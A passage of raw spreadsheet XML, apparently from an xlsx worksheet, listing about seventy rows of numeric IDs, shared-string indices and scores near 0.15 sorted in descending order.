    <row r="282" ht="15.75" customHeight="1">
      <c r="A282" s="1">
        <v>23079.0</v>
      </c>
      <c r="B282" s="2">
        <v>5.0530213E7</v>
      </c>
      <c r="C282" s="2" t="s">
        <v>247</v>
      </c>
      <c r="D282" s="2">
        <v>1.0</v>
      </c>
      <c r="E282" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F282" s="2">
        <v>0.1533996683250415</v>
      </c>
    </row>
    <row r="283" ht="15.75" customHeight="1">
      <c r="A283" s="1">
        <v>22631.0</v>
      </c>
      <c r="B283" s="2">
        <v>4.0518273E7</v>
      </c>
      <c r="C283" s="2" t="s">
        <v>248</v>
      </c>
      <c r="D283" s="2">
        <v>1.0</v>
      </c>
      <c r="E283" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F283" s="2">
        <v>0.1531746031746032</v>
      </c>
    </row>
    <row r="284" ht="15.75" customHeight="1">
      <c r="A284" s="1">
        <v>783.0</v>
      </c>
      <c r="B284" s="2">
        <v>2.1193158E7</v>
      </c>
      <c r="C284" s="2" t="s">
        <v>249</v>
      </c>
      <c r="D284" s="2">
        <v>1.0</v>
      </c>
      <c r="E284" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F284" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="285" ht="15.75" customHeight="1">
      <c r="A285" s="1">
        <v>21661.0</v>
      </c>
      <c r="B285" s="2">
        <v>2.4997612E7</v>
      </c>
      <c r="C285" s="2" t="s">
        <v>250</v>
      </c>
      <c r="D285" s="2">
        <v>1.0</v>
      </c>
      <c r="E285" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F285" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="286" ht="15.75" customHeight="1">
      <c r="A286" s="1">
        <v>22007.0</v>
      </c>
      <c r="B286" s="2">
        <v>2.9827217E7</v>
      </c>
      <c r="C286" s="2" t="s">
        <v>251</v>
      </c>
      <c r="D286" s="2">
        <v>1.0</v>
      </c>
      <c r="E286" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F286" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="287" ht="15.75" customHeight="1">
      <c r="A287" s="1">
        <v>25840.0</v>
      </c>
      <c r="B287" s="2">
        <v>1.4792727E7</v>
      </c>
      <c r="C287" s="2" t="s">
        <v>252</v>
      </c>
      <c r="D287" s="2">
        <v>1.0</v>
      </c>
      <c r="E287" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F287" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="288" ht="15.75" customHeight="1">
      <c r="A288" s="1">
        <v>26171.0</v>
      </c>
      <c r="B288" s="2">
        <v>1.6139328E7</v>
      </c>
      <c r="C288" s="2" t="s">
        <v>253</v>
      </c>
      <c r="D288" s="2">
        <v>1.0</v>
      </c>
      <c r="E288" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F288" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="289" ht="15.75" customHeight="1">
      <c r="A289" s="1">
        <v>26625.0</v>
      </c>
      <c r="B289" s="2">
        <v>1.8043106E7</v>
      </c>
      <c r="C289" s="2" t="s">
        <v>254</v>
      </c>
      <c r="D289" s="2">
        <v>1.0</v>
      </c>
      <c r="E289" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F289" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="290" ht="15.75" customHeight="1">
      <c r="A290" s="1">
        <v>28395.0</v>
      </c>
      <c r="B290" s="2">
        <v>2.626623E7</v>
      </c>
      <c r="C290" s="2" t="s">
        <v>255</v>
      </c>
      <c r="D290" s="2">
        <v>1.0</v>
      </c>
      <c r="E290" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F290" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="291" ht="15.75" customHeight="1">
      <c r="A291" s="1">
        <v>28744.0</v>
      </c>
      <c r="B291" s="2">
        <v>2.8113507E7</v>
      </c>
      <c r="C291" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D291" s="2">
        <v>1.0</v>
      </c>
      <c r="E291" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F291" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="292" ht="15.75" customHeight="1">
      <c r="A292" s="1">
        <v>28984.0</v>
      </c>
      <c r="B292" s="2">
        <v>2.9827216E7</v>
      </c>
      <c r="C292" s="2" t="s">
        <v>251</v>
      </c>
      <c r="D292" s="2">
        <v>1.0</v>
      </c>
      <c r="E292" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F292" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="293" ht="15.75" customHeight="1">
      <c r="A293" s="1">
        <v>29614.0</v>
      </c>
      <c r="B293" s="2">
        <v>3.3621469E7</v>
      </c>
      <c r="C293" s="2" t="s">
        <v>257</v>
      </c>
      <c r="D293" s="2">
        <v>1.0</v>
      </c>
      <c r="E293" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F293" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="294" ht="15.75" customHeight="1">
      <c r="A294" s="1">
        <v>32663.0</v>
      </c>
      <c r="B294" s="2">
        <v>5914198.0</v>
      </c>
      <c r="C294" s="2" t="s">
        <v>258</v>
      </c>
      <c r="D294" s="2">
        <v>1.0</v>
      </c>
      <c r="E294" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F294" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="295" ht="15.75" customHeight="1">
      <c r="A295" s="1">
        <v>32747.0</v>
      </c>
      <c r="B295" s="2">
        <v>6049014.0</v>
      </c>
      <c r="C295" s="2" t="s">
        <v>259</v>
      </c>
      <c r="D295" s="2">
        <v>1.0</v>
      </c>
      <c r="E295" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F295" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="296" ht="15.75" customHeight="1">
      <c r="A296" s="1">
        <v>32938.0</v>
      </c>
      <c r="B296" s="2">
        <v>6461197.0</v>
      </c>
      <c r="C296" s="2" t="s">
        <v>260</v>
      </c>
      <c r="D296" s="2">
        <v>1.0</v>
      </c>
      <c r="E296" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F296" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="297" ht="15.75" customHeight="1">
      <c r="A297" s="1">
        <v>33537.0</v>
      </c>
      <c r="B297" s="2">
        <v>8148794.0</v>
      </c>
      <c r="C297" s="2" t="s">
        <v>261</v>
      </c>
      <c r="D297" s="2">
        <v>1.0</v>
      </c>
      <c r="E297" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F297" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="298" ht="15.75" customHeight="1">
      <c r="A298" s="1">
        <v>24672.0</v>
      </c>
      <c r="B298" s="2">
        <v>1.1583695E7</v>
      </c>
      <c r="C298" s="2" t="s">
        <v>222</v>
      </c>
      <c r="D298" s="2">
        <v>1.0</v>
      </c>
      <c r="E298" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F298" s="2">
        <v>0.1523569023569024</v>
      </c>
    </row>
    <row r="299" ht="15.75" customHeight="1">
      <c r="A299" s="1">
        <v>31644.0</v>
      </c>
      <c r="B299" s="2">
        <v>5150887.0</v>
      </c>
      <c r="C299" s="2" t="s">
        <v>262</v>
      </c>
      <c r="D299" s="2">
        <v>1.0</v>
      </c>
      <c r="E299" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F299" s="2">
        <v>0.1523569023569024</v>
      </c>
    </row>
    <row r="300" ht="15.75" customHeight="1">
      <c r="A300" s="1">
        <v>26423.0</v>
      </c>
      <c r="B300" s="2">
        <v>1.7155444E7</v>
      </c>
      <c r="C300" s="2" t="s">
        <v>263</v>
      </c>
      <c r="D300" s="2">
        <v>1.0</v>
      </c>
      <c r="E300" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F300" s="2">
        <v>0.1522988505747127</v>
      </c>
    </row>
    <row r="301" ht="15.75" customHeight="1">
      <c r="A301" s="1">
        <v>23440.0</v>
      </c>
      <c r="B301" s="2">
        <v>5.6660256E7</v>
      </c>
      <c r="C301" s="2" t="s">
        <v>264</v>
      </c>
      <c r="D301" s="2">
        <v>1.0</v>
      </c>
      <c r="E301" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F301" s="2">
        <v>0.1520947176684882</v>
      </c>
    </row>
    <row r="302" ht="15.75" customHeight="1">
      <c r="A302" s="1">
        <v>14331.0</v>
      </c>
      <c r="B302" s="2">
        <v>3.8761844E7</v>
      </c>
      <c r="C302" s="2" t="s">
        <v>265</v>
      </c>
      <c r="D302" s="2">
        <v>1.0</v>
      </c>
      <c r="E302" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F302" s="2">
        <v>0.1520061728395062</v>
      </c>
    </row>
    <row r="303" ht="15.75" customHeight="1">
      <c r="A303" s="1">
        <v>22378.0</v>
      </c>
      <c r="B303" s="2">
        <v>3.5113689E7</v>
      </c>
      <c r="C303" s="2" t="s">
        <v>266</v>
      </c>
      <c r="D303" s="2">
        <v>1.0</v>
      </c>
      <c r="E303" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F303" s="2">
        <v>0.1517857142857144</v>
      </c>
    </row>
    <row r="304" ht="15.75" customHeight="1">
      <c r="A304" s="1">
        <v>23921.0</v>
      </c>
      <c r="B304" s="2">
        <v>8555884.0</v>
      </c>
      <c r="C304" s="2" t="s">
        <v>267</v>
      </c>
      <c r="D304" s="2">
        <v>1.0</v>
      </c>
      <c r="E304" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F304" s="2">
        <v>0.1517857142857144</v>
      </c>
    </row>
    <row r="305" ht="15.75" customHeight="1">
      <c r="A305" s="1">
        <v>29742.0</v>
      </c>
      <c r="B305" s="2">
        <v>3.4656878E7</v>
      </c>
      <c r="C305" s="2" t="s">
        <v>268</v>
      </c>
      <c r="D305" s="2">
        <v>1.0</v>
      </c>
      <c r="E305" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F305" s="2">
        <v>0.1517857142857144</v>
      </c>
    </row>
    <row r="306" ht="15.75" customHeight="1">
      <c r="A306" s="1">
        <v>33739.0</v>
      </c>
      <c r="B306" s="2">
        <v>8555883.0</v>
      </c>
      <c r="C306" s="2" t="s">
        <v>269</v>
      </c>
      <c r="D306" s="2">
        <v>1.0</v>
      </c>
      <c r="E306" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F306" s="2">
        <v>0.1517857142857144</v>
      </c>
    </row>
    <row r="307" ht="15.75" customHeight="1">
      <c r="A307" s="1">
        <v>18776.0</v>
      </c>
      <c r="B307" s="2">
        <v>5.3797892E7</v>
      </c>
      <c r="C307" s="2" t="s">
        <v>270</v>
      </c>
      <c r="D307" s="2">
        <v>1.0</v>
      </c>
      <c r="E307" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F307" s="2">
        <v>0.1517412935323384</v>
      </c>
    </row>
    <row r="308" ht="15.75" customHeight="1">
      <c r="A308" s="1">
        <v>21380.0</v>
      </c>
      <c r="B308" s="2">
        <v>2.1677757E7</v>
      </c>
      <c r="C308" s="2" t="s">
        <v>271</v>
      </c>
      <c r="D308" s="2">
        <v>1.0</v>
      </c>
      <c r="E308" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F308" s="2">
        <v>0.1517412935323384</v>
      </c>
    </row>
    <row r="309" ht="15.75" customHeight="1">
      <c r="A309" s="1">
        <v>25493.0</v>
      </c>
      <c r="B309" s="2">
        <v>1.4062622E7</v>
      </c>
      <c r="C309" s="2" t="s">
        <v>243</v>
      </c>
      <c r="D309" s="2">
        <v>1.0</v>
      </c>
      <c r="E309" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F309" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="310" ht="15.75" customHeight="1">
      <c r="A310" s="1">
        <v>26210.0</v>
      </c>
      <c r="B310" s="2">
        <v>1.6249643E7</v>
      </c>
      <c r="C310" s="2" t="s">
        <v>272</v>
      </c>
      <c r="D310" s="2">
        <v>1.0</v>
      </c>
      <c r="E310" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F310" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="311" ht="15.75" customHeight="1">
      <c r="A311" s="1">
        <v>29675.0</v>
      </c>
      <c r="B311" s="2">
        <v>3.3994054E7</v>
      </c>
      <c r="C311" s="2" t="s">
        <v>273</v>
      </c>
      <c r="D311" s="2">
        <v>1.0</v>
      </c>
      <c r="E311" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F311" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="312" ht="15.75" customHeight="1">
      <c r="A312" s="1">
        <v>30655.0</v>
      </c>
      <c r="B312" s="2">
        <v>4.2024021E7</v>
      </c>
      <c r="C312" s="2" t="s">
        <v>274</v>
      </c>
      <c r="D312" s="2">
        <v>1.0</v>
      </c>
      <c r="E312" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F312" s="2">
        <v>0.1512820512820513</v>
      </c>
    </row>
    <row r="313" ht="15.75" customHeight="1">
      <c r="A313" s="1">
        <v>24070.0</v>
      </c>
      <c r="B313" s="2">
        <v>9664274.0</v>
      </c>
      <c r="C313" s="2" t="s">
        <v>275</v>
      </c>
      <c r="D313" s="2">
        <v>1.0</v>
      </c>
      <c r="E313" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F313" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="314" ht="15.75" customHeight="1">
      <c r="A314" s="1">
        <v>28889.0</v>
      </c>
      <c r="B314" s="2">
        <v>2.9242847E7</v>
      </c>
      <c r="C314" s="2" t="s">
        <v>276</v>
      </c>
      <c r="D314" s="2">
        <v>1.0</v>
      </c>
      <c r="E314" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F314" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="315" ht="15.75" customHeight="1">
      <c r="A315" s="1">
        <v>32112.0</v>
      </c>
      <c r="B315" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C315" s="2" t="s">
        <v>277</v>
      </c>
      <c r="D315" s="2">
        <v>1.0</v>
      </c>
      <c r="E315" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F315" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="316" ht="15.75" customHeight="1">
      <c r="A316" s="1">
        <v>21688.0</v>
      </c>
      <c r="B316" s="2">
        <v>2.5186109E7</v>
      </c>
      <c r="C316" s="2" t="s">
        <v>278</v>
      </c>
      <c r="D316" s="2">
        <v>1.0</v>
      </c>
      <c r="E316" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F316" s="2">
        <v>0.1510721247563353</v>
      </c>
    </row>
    <row r="317" ht="15.75" customHeight="1">
      <c r="A317" s="1">
        <v>22470.0</v>
      </c>
      <c r="B317" s="2">
        <v>3.6754478E7</v>
      </c>
      <c r="C317" s="2" t="s">
        <v>279</v>
      </c>
      <c r="D317" s="2">
        <v>1.0</v>
      </c>
      <c r="E317" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F317" s="2">
        <v>0.1510721247563353</v>
      </c>
    </row>
    <row r="318" ht="15.75" customHeight="1">
      <c r="A318" s="1">
        <v>30192.0</v>
      </c>
      <c r="B318" s="2">
        <v>3.7232715E7</v>
      </c>
      <c r="C318" s="2" t="s">
        <v>280</v>
      </c>
      <c r="D318" s="2">
        <v>1.0</v>
      </c>
      <c r="E318" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F318" s="2">
        <v>0.1510721247563353</v>
      </c>
    </row>
    <row r="319" ht="15.75" customHeight="1">
      <c r="A319" s="1">
        <v>21764.0</v>
      </c>
      <c r="B319" s="2">
        <v>2.6266231E7</v>
      </c>
      <c r="C319" s="2" t="s">
        <v>281</v>
      </c>
      <c r="D319" s="2">
        <v>1.0</v>
      </c>
      <c r="E319" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F319" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="320" ht="15.75" customHeight="1">
      <c r="A320" s="1">
        <v>29304.0</v>
      </c>
      <c r="B320" s="2">
        <v>3.1262736E7</v>
      </c>
      <c r="C320" s="2" t="s">
        <v>282</v>
      </c>
      <c r="D320" s="2">
        <v>1.0</v>
      </c>
      <c r="E320" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F320" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="321" ht="15.75" customHeight="1">
      <c r="A321" s="1">
        <v>30617.0</v>
      </c>
      <c r="B321" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C321" s="2" t="s">
        <v>283</v>
      </c>
      <c r="D321" s="2">
        <v>1.0</v>
      </c>
      <c r="E321" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F321" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="322" ht="15.75" customHeight="1">
      <c r="A322" s="1">
        <v>19240.0</v>
      </c>
      <c r="B322" s="2">
        <v>5.5078792E7</v>
      </c>
      <c r="C322" s="2" t="s">
        <v>284</v>
      </c>
      <c r="D322" s="2">
        <v>1.0</v>
      </c>
      <c r="E322" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F322" s="2">
        <v>0.1509259259259259</v>
      </c>
    </row>
    <row r="323" ht="15.75" customHeight="1">
      <c r="A323" s="1">
        <v>27154.0</v>
      </c>
      <c r="B323" s="2">
        <v>2.0790814E7</v>
      </c>
      <c r="C323" s="2" t="s">
        <v>285</v>
      </c>
      <c r="D323" s="2">
        <v>1.0</v>
      </c>
      <c r="E323" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F323" s="2">
        <v>0.1505636070853463</v>
      </c>
    </row>
    <row r="324" ht="15.75" customHeight="1">
      <c r="A324" s="1">
        <v>15948.0</v>
      </c>
      <c r="B324" s="2">
        <v>4.4750077E7</v>
      </c>
      <c r="C324" s="2" t="s">
        <v>286</v>
      </c>
      <c r="D324" s="2">
        <v>1.0</v>
      </c>
      <c r="E324" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F324" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="325" ht="15.75" customHeight="1">
      <c r="A325" s="1">
        <v>19197.0</v>
      </c>
      <c r="B325" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C325" s="2" t="s">
        <v>287</v>
      </c>
      <c r="D325" s="2">
        <v>1.0</v>
      </c>
      <c r="E325" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F325" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="326" ht="15.75" customHeight="1">
      <c r="A326" s="1">
        <v>21390.0</v>
      </c>
      <c r="B326" s="2">
        <v>2.1759997E7</v>
      </c>
      <c r="C326" s="2" t="s">
        <v>288</v>
      </c>
      <c r="D326" s="2">
        <v>1.0</v>
      </c>
      <c r="E326" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F326" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="327" ht="15.75" customHeight="1">
      <c r="A327" s="1">
        <v>22257.0</v>
      </c>
      <c r="B327" s="2">
        <v>3.2823361E7</v>
      </c>
      <c r="C327" s="2" t="s">
        <v>289</v>
      </c>
      <c r="D327" s="2">
        <v>1.0</v>
      </c>
      <c r="E327" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F327" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="328" ht="15.75" customHeight="1">
      <c r="A328" s="1">
        <v>22922.0</v>
      </c>
      <c r="B328" s="2">
        <v>4.8394206E7</v>
      </c>
      <c r="C328" s="2" t="s">
        <v>290</v>
      </c>
      <c r="D328" s="2">
        <v>1.0</v>
      </c>
      <c r="E328" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F328" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="329" ht="15.75" customHeight="1">
      <c r="A329" s="1">
        <v>23673.0</v>
      </c>
      <c r="B329" s="2">
        <v>6922374.0</v>
      </c>
      <c r="C329" s="2" t="s">
        <v>291</v>
      </c>
      <c r="D329" s="2">
        <v>1.0</v>
      </c>
      <c r="E329" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F329" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="330" ht="15.75" customHeight="1">
      <c r="A330" s="1">
        <v>23844.0</v>
      </c>
      <c r="B330" s="2">
        <v>8166478.0</v>
      </c>
      <c r="C330" s="2" t="s">
        <v>292</v>
      </c>
      <c r="D330" s="2">
        <v>1.0</v>
      </c>
      <c r="E330" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F330" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="331" ht="15.75" customHeight="1">
      <c r="A331" s="1">
        <v>27787.0</v>
      </c>
      <c r="B331" s="2">
        <v>2.3130096E7</v>
      </c>
      <c r="C331" s="2" t="s">
        <v>293</v>
      </c>
      <c r="D331" s="2">
        <v>1.0</v>
      </c>
      <c r="E331" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F331" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="332" ht="15.75" customHeight="1">
      <c r="A332" s="1">
        <v>28107.0</v>
      </c>
      <c r="B332" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C332" s="2" t="s">
        <v>294</v>
      </c>
      <c r="D332" s="2">
        <v>1.0</v>
      </c>
      <c r="E332" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F332" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="333" ht="15.75" customHeight="1">
      <c r="A333" s="1">
        <v>29531.0</v>
      </c>
      <c r="B333" s="2">
        <v>3.282336E7</v>
      </c>
      <c r="C333" s="2" t="s">
        <v>289</v>
      </c>
      <c r="D333" s="2">
        <v>1.0</v>
      </c>
      <c r="E333" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F333" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="334" ht="15.75" customHeight="1">
      <c r="A334" s="1">
        <v>29644.0</v>
      </c>
      <c r="B334" s="2">
        <v>3.3800262E7</v>
      </c>
      <c r="C334" s="2" t="s">
        <v>295</v>
      </c>
      <c r="D334" s="2">
        <v>1.0</v>
      </c>
      <c r="E334" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F334" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="335" ht="15.75" customHeight="1">
      <c r="A335" s="1">
        <v>29773.0</v>
      </c>
      <c r="B335" s="2">
        <v>3.4960152E7</v>
      </c>
      <c r="C335" s="2" t="s">
        <v>296</v>
      </c>
      <c r="D335" s="2">
        <v>1.0</v>
      </c>
      <c r="E335" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F335" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="336" ht="15.75" customHeight="1">
      <c r="A336" s="1">
        <v>30580.0</v>
      </c>
      <c r="B336" s="2">
        <v>4112371.0</v>
      </c>
      <c r="C336" s="2" t="s">
        <v>297</v>
      </c>
      <c r="D336" s="2">
        <v>1.0</v>
      </c>
      <c r="E336" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F336" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="337" ht="15.75" customHeight="1">
      <c r="A337" s="1">
        <v>30799.0</v>
      </c>
      <c r="B337" s="2">
        <v>4.5216853E7</v>
      </c>
      <c r="C337" s="2" t="s">
        <v>298</v>
      </c>
      <c r="D337" s="2">
        <v>1.0</v>
      </c>
      <c r="E337" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F337" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="338" ht="15.75" customHeight="1">
      <c r="A338" s="1">
        <v>32162.0</v>
      </c>
      <c r="B338" s="2">
        <v>5.4393582E7</v>
      </c>
      <c r="C338" s="2" t="s">
        <v>299</v>
      </c>
      <c r="D338" s="2">
        <v>1.0</v>
      </c>
      <c r="E338" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F338" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="339" ht="15.75" customHeight="1">
      <c r="A339" s="1">
        <v>33067.0</v>
      </c>
      <c r="B339" s="2">
        <v>6839234.0</v>
      </c>
      <c r="C339" s="2" t="s">
        <v>300</v>
      </c>
      <c r="D339" s="2">
        <v>1.0</v>
      </c>
      <c r="E339" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F339" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="340" ht="15.75" customHeight="1">
      <c r="A340" s="1">
        <v>33081.0</v>
      </c>
      <c r="B340" s="2">
        <v>6922373.0</v>
      </c>
      <c r="C340" s="2" t="s">
        <v>291</v>
      </c>
      <c r="D340" s="2">
        <v>1.0</v>
      </c>
      <c r="E340" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F340" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="341" ht="15.75" customHeight="1">
      <c r="A341" s="1">
        <v>33542.0</v>
      </c>
      <c r="B341" s="2">
        <v>8166477.0</v>
      </c>
      <c r="C341" s="2" t="s">
        <v>292</v>
      </c>
      <c r="D341" s="2">
        <v>1.0</v>
      </c>
      <c r="E341" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F341" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="342" ht="15.75" customHeight="1">
      <c r="A342" s="1">
        <v>29375.0</v>
      </c>
      <c r="B342" s="2">
        <v>3.1746659E7</v>
      </c>
      <c r="C342" s="2" t="s">
        <v>301</v>
      </c>
      <c r="D342" s="2">
        <v>1.0</v>
      </c>
      <c r="E342" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F342" s="2">
        <v>0.1498015873015874</v>
      </c>
    </row>
    <row r="343" ht="15.75" customHeight="1">
      <c r="A343" s="1">
        <v>29838.0</v>
      </c>
      <c r="B343" s="2">
        <v>3.5566805E7</v>
      </c>
      <c r="C343" s="2" t="s">
        <v>302</v>
      </c>
      <c r="D343" s="2">
        <v>1.0</v>
      </c>
      <c r="E343" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F343" s="2">
        <v>0.1498015873015874</v>
      </c>
    </row>
    <row r="344" ht="15.75" customHeight="1">
      <c r="A344" s="1">
        <v>25252.0</v>
      </c>
      <c r="B344" s="2">
        <v>1.3382816E7</v>
      </c>
      <c r="C344" s="2" t="s">
        <v>303</v>
      </c>
      <c r="D344" s="2">
        <v>1.0</v>
      </c>
      <c r="E344" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F344" s="2">
        <v>0.149641577060932</v>
      </c>
    </row>
    <row r="345" ht="15.75" customHeight="1">
      <c r="A345" s="1">
        <v>30756.0</v>
      </c>
      <c r="B345" s="2">
        <v>4.4241972E7</v>
      </c>
      <c r="C345" s="2" t="s">
        <v>304</v>
      </c>
      <c r="D345" s="2">
        <v>1.0</v>
      </c>
      <c r="E345" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F345" s="2">
        <v>0.149641577060932</v>
      </c>
    </row>
    <row r="346" ht="15.75" customHeight="1">
      <c r="A346" s="1">
        <v>27052.0</v>
      </c>
      <c r="B346" s="2">
        <v>2.031696E7</v>
      </c>
      <c r="C346" s="2" t="s">
        <v>305</v>
      </c>
      <c r="D346" s="2">
        <v>1.0</v>
      </c>
      <c r="E346" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F346" s="2">
        <v>0.1495098039215687</v>
      </c>
    </row>
    <row r="347" ht="15.75" customHeight="1">
      <c r="A347" s="1">
        <v>12213.0</v>
      </c>
      <c r="B347" s="2">
        <v>2.7650186E7</v>
      </c>
      <c r="C347" s="2" t="s">
        <v>306</v>
      </c>
      <c r="D347" s="2">
        <v>1.0</v>
      </c>
      <c r="E347" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F347" s="2">
        <v>0.1491769547325103</v>
      </c>
    </row>
    <row r="348" ht="15.75" customHeight="1">
      <c r="A348" s="1">
        <v>33492.0</v>
      </c>
      <c r="B348" s="2">
        <v>8001451.0</v>
      </c>
      <c r="C348" s="2" t="s">
        <v>307</v>
      </c>
      <c r="D348" s="2">
        <v>1.0</v>
      </c>
      <c r="E348" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F348" s="2">
        <v>0.1491769547325103</v>
      </c>
    </row>
    <row r="349" ht="15.75" customHeight="1">
      <c r="A349" s="1">
        <v>28182.0</v>
      </c>
      <c r="B349" s="2">
        <v>2.4997611E7</v>
      </c>
      <c r="C349" s="2" t="s">
        <v>250</v>
      </c>
      <c r="D349" s="2">
        <v>1.0</v>
      </c>
      <c r="E349" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F349" s="2">
        <v>0.1490740740740741</v>
      </c>
    </row>
    <row r="350" ht="15.75" customHeight="1">
      <c r="A350" s="1">
        <v>33460.0</v>
      </c>
      <c r="B350" s="2">
        <v>7915039.0</v>
      </c>
      <c r="C350" s="2" t="s">
        <v>308</v>
      </c>
      <c r="D350" s="2">
        <v>1.0</v>
      </c>
      <c r="E350" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F350" s="2">
        <v>0.1490740740740741</v>
      </c>
    </row>
    <row r="351" ht="15.75" customHeight="1">
      <c r="A351" s="1">
        <v>28693.0</v>
      </c>
      <c r="B351" s="2">
        <v>2.7645392E7</v>
      </c>
      <c r="C351" s="2" t="s">
        <v>309</v>
      </c>
      <c r="D351" s="2">
        <v>1.0</v>
      </c>
      <c r="E351" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F351" s="2">
        <v>0.148989898989899</v>
